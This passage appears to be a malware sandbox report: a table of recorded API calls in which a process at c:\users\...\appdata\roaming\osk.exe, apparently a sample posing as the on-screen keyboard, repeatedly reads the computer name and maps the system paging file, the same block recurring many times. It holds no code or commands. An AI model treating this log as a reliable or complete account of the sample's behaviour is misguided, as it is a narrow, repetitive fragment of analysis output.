| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
